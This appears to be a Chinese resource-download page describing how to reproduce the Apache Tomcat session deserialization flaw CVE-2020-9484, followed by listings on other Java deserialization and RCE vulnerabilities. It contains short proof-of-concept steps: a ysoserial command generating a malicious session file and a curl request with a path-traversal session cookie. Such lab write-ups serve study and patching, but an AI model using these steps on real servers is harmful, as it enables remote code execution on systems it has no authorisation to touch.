Advertisement

CVE-2020-9484:通过Kali 2.0重现Apache Tomcat会话反序列化代码执行漏洞,涉及源码。

  •  5星
  •     浏览量: 0
  •     大小:None
  •      文件类型:None


简介:
CVE-2020-9484是一个利用Apache Tomcat Session反序列化漏洞的代码执行漏洞。为了演示该漏洞,可以使用Kali 2.0进行复现。具体环境配置包括:Kali 2.0以及 apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp部署在s2-053容器中,并在其lib目录下添加了commons-collections4-4.0.jar)。启动Tomcat服务器可以通过执行 /yourtomcatdir/bin/startup.sh 命令来完成。为了生成可利用的有效载荷,可以使用java -jar ysoserial-0.0.6-SNAPSHOT-all.jar 并执行 “touch /tmp/9484” > /tmp/22222.session。随后,需要先访问S2-053以确认其是否正常启动。接着,重新抓包并使用intruder进行路径遍历,最终成功执行命令。参考信息请见:

全部评论 (0)

还没有任何评论哟~
客服
客服
  • CVE-2020-9484: 使用Kali 2.0Apache Tomcat Session-
    优质
    本文详细介绍如何利用Kali Linux 2.0系统重现Apache Tomcat中的Session反序列化导致的代码执行安全漏洞,通过实际操作和源码分析帮助读者深入理解该漏洞的工作原理及防范措施。 复现Apache Tomcat Session反序列化代码执行漏洞CVE-2020-9484的步骤如下: 环境:使用Kali 2.0操作系统及apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(包含webapp s2-053,在其lib下添加了commons-collections4-4.0.jar)。 启动步骤: 1. 启动Tomcat:在终端中输入`/yourtomcatdir/bin/startup.sh` 2. 生成有效载荷:使用命令 `java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 touch /tmp/9484>/tmp/22222.session` 利用步骤: 1. 访问s2-053以确认服务是否正常运行。 2. 再次访问该webapp并抓包,使用intruder进行路径遍历测试。 3. 成功执行命令后即可验证漏洞已被触发。
  • Apache OFBiz CVE-2021-26295: RMI...
    优质
    本篇文章主要介绍了Apache OFBiz中的CVE-2021-26295 RMI反序列化安全漏洞,详细解析了该漏洞的原因、影响及修复方法。 CVE-2021-26295 是 Apache OFBiz 中的一个 rmi 反序列化漏洞的利用证明(POC)。使用该 POC 时需要将 ysoserial.jar 放置在指定目录,并且不能使用较高版本的 Java。
  • Apache OFBizCVE-2021-26295).md
    优质
    本文章介绍了Apache OFBiz框架中的一个关键安全漏洞(CVE-2021-26295),分析了该漏洞的技术细节及其潜在危害,并提供了相应的修复建议。 CVE-2021-26295 是 Apache OFBiz 中的一个反序列化漏洞。此漏洞可能被攻击者利用来执行恶意代码或获取敏感数据。建议受影响的用户尽快更新到最新版本以修复该问题。
  • Apache Log4j 1.2.X中的CVE-2019-17571:导致的远程
    优质
    简介:Apache Log4j 1.2.X中存在的CVE-2019-17571漏洞,源于软件对用户提供的输入缺乏足够的验证机制,攻击者可利用该漏洞通过恶意构造的数据触发反序列化操作,从而导致远程代码执行。此高危安全问题需立即更新修复。 Apache Log4j 1.2.X 存在反序列化远程代码执行漏洞预警 **漏洞描述** Apache Log4j 是一款基于 Java 的开源日志记录工具,由美国阿帕奇(Apache)软件基金会开发。Log4j 1.2.X 系列版本中存在一个反序列化远程代码执行的漏洞。攻击者可以利用该漏洞来执行任意恶意命令。 在 Log4j 1.2 中包含了一个名为 SocketServer 的类,此类容易对不可信数据进行反序列化处理。当其监听的日志数据来自不可信网络流量时,与反序列化的工具结合使用的情况下,能够使攻击者利用该漏洞远程执行任意代码。 **影响范围** 受影响的版本包括从 1.2.4 到最新版 1.2.17 的所有 Log4j 版本。 **修复建议** - 升级到 Apache Log4j 2 系列的最新版本 - 避免将 SocketServer 类开启的 socket 端口暴露在互联网上 **漏洞验证** 可以通过特定的方法来确认此漏洞的存在,确保系统的安全。
  • Fastjson 1.2.8远程
    优质
    简介:Fastjson 1.2.8版本存在一个严重的安全漏洞,允许攻击者通过精心构造的输入触发反序列化的远程代码执行。此漏洞影响了大量使用该库的应用程序的安全性,需要用户及时更新到修复版本以防止潜在的攻击。 使用黑白名单方法防御反序列化漏洞的astjson在黑客不断发现新的反序列化Gadgets类的情况下,在autoType关闭的状态下仍然可能绕过黑名单机制,导致远程命令执行的风险。研究表明,该漏洞利用门槛较低,并且可以规避autoType限制,因此风险影响较大。
  • WebLogic CVE-2020-14882 远程.zip
    优质
    本资料包包含针对CVE-2020-14882漏洞的分析与利用教程,该漏洞影响Oracle WebLogic Server,允许攻击者远程执行代码。适合安全研究人员学习参考。 学习记录笔记:CVE-2020-14882 WebLogic远程代码执行漏洞 一、WebLogic简介 二、漏洞描述 三、影响环境 四、环境搭建 五、漏洞复现 六、修复建议 以上六个部分涵盖了从了解WebLogic基础到详细记录如何进行CVE-2020-14882的漏洞学习,包括其对不同环境的影响分析和实际操作步骤。此外还包括了针对该漏洞的具体修复措施与建议。
  • -CVE-2020-9484
    优质
    源码-CVE-2020-9484提供关于CVE-2020-9484漏洞的详细解析与利用代码,帮助安全研究人员深入理解该漏洞的工作原理及其潜在影响。 CVE-2020-9484(Tomcat) 仅用于教育目的。 运行以下命令: ``` $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy ``` 开发时使用: ``` $ curl http://127.0.0.1:8080/index.jsp -H Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy ``` 查看文件: ``` $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce ```
  • Fastjson 1.2.69 远程详解.docx
    优质
    本文档详细解析了Fastjson 1.2.69版本中的反序列化远程代码执行漏洞,包括漏洞原理、利用条件及修复建议。 Fastjson 1.2.69 版本存在反序列化远程代码执行漏洞。该版本通过黑白名单的方法来防御反序列化攻击,然而当黑客不断发现新的反序列化 Gadget 类时,在 autoType 功能关闭的情况下仍然可能绕过黑白名单的防护机制,导致远程命令执行。 研究表明,此漏洞利用难度较低,并且可以避开 autoType 限制,因此潜在风险较大。阿里云应急响应中心建议 Fastjson 用户尽快采取安全措施以防止该漏洞被攻击者利用。
  • Apache Druid CVE-2021-25646命令.zip
    优质
    该资料包提供了关于Apache Druid中CVE-2021-25646漏洞的详细信息及其实验环境,帮助安全研究人员与开发人员理解和重现此高危命令执行漏洞。 Apache Druid 命令执行漏洞(CVE-2021-25646)复现学习笔记包括以下四部分内容:1. Apache Druid 命令执行漏洞(CVE-2021-25646)复现.pdf;2. apache-druid-0.20.0-bin.tar.gz;3. dns解析.txt;4. 反弹shell.txt。
  • Apache Tomcat 文件包含 (CNVD-2020-10487, 对应 CVE-2020-1938)
    优质
    Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)是一种远程代码执行安全缺陷,允许攻击者通过精心构造的HTTP请求在服务器上执行任意代码。此漏洞影响多个版本的Tomcat,建议用户及时更新至最新版本以防止潜在的安全威胁。 Apache Tomcat 是一款广泛应用的开源Java Servlet容器,它允许开发者部署和运行Java Web应用程序。CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求将恶意代码注入到Tomcat服务器上,从而执行任意系统命令、获取敏感信息甚至完全控制服务器。 ### 漏洞原理 文件包含漏洞通常发生在Web应用处理用户输入时没有正确地过滤或验证输入,导致程序错误地包含了恶意用户提供的远程或本地文件路径。在Apache Tomcat的情况下,这个漏洞与Tomcat的`ServerPages (JSP)`和`JavaServer Pages Standard Tag Library (JSTL)`组件有关。攻击者可以通过利用此漏洞将恶意的JSP文件路径插入到请求中,使得Tomcat服务器尝试解析并执行这些恶意文件。 ### 影响范围 这个漏洞影响了Tomcat的多个版本,包括但不限于7.x, 8.x, 和9.x。如果你的服务器正在运行这些版本的Tomcat且未对用户输入进行严格的过滤,则你的系统可能面临风险。 ### 攻击方式 攻击者可能会使用以下几种方式来触发此漏洞: 1. **HTTP请求注入**:通过构造特定的URL请求,包含恶意的JSP文件路径。 2. **利用JSP表达式语言(EL)**:EL允许在JSP页面中直接访问服务器上的对象。攻击者可能利用这一点读取或执行非法文件。 3. **JSTL标签库滥用**:攻击者可以使用``等标签来包含并执行恶意文件。 ### 防护措施 1. **升级Tomcat**:确保你的Apache Tomcat版本是最新的,官方已经发布了修复此漏洞的补丁,请尽快安装更新。 2. **限制JSP文件解析**:在Tomcat配置中可以禁用对特定目录的JSP文件解析以避免恶意文件被执行。 3. **输入验证**:严格验证用户提供的路径和请求中的内容,拒绝包含特殊字符或可疑路径的请求。 4. **防火墙策略**:设置防火墙规则来阻止非预期的JSP文件请求。 5. **日志监控**:定期检查服务器日志以及时发现异常行为。 ### 漏洞验证 详细的操作指南可能包括了复现漏洞的方法,这对于测试系统是否存在漏洞和理解其机制非常有用。若有疑问,请咨询相关团队或专家进行进一步的指导。 ### 后续处理 修复漏洞后建议进行渗透测试确认漏洞已完全消除,并提升整个团队的安全意识,以防止未来类似事件的发生。 Apache Tomcat 文件包含漏洞是一个严重的问题,需要及时修复以保护服务器免受恶意攻击。通过了解其原理、攻击方式和防护措施可以更好地管理和维护Web服务,确保系统的安全性。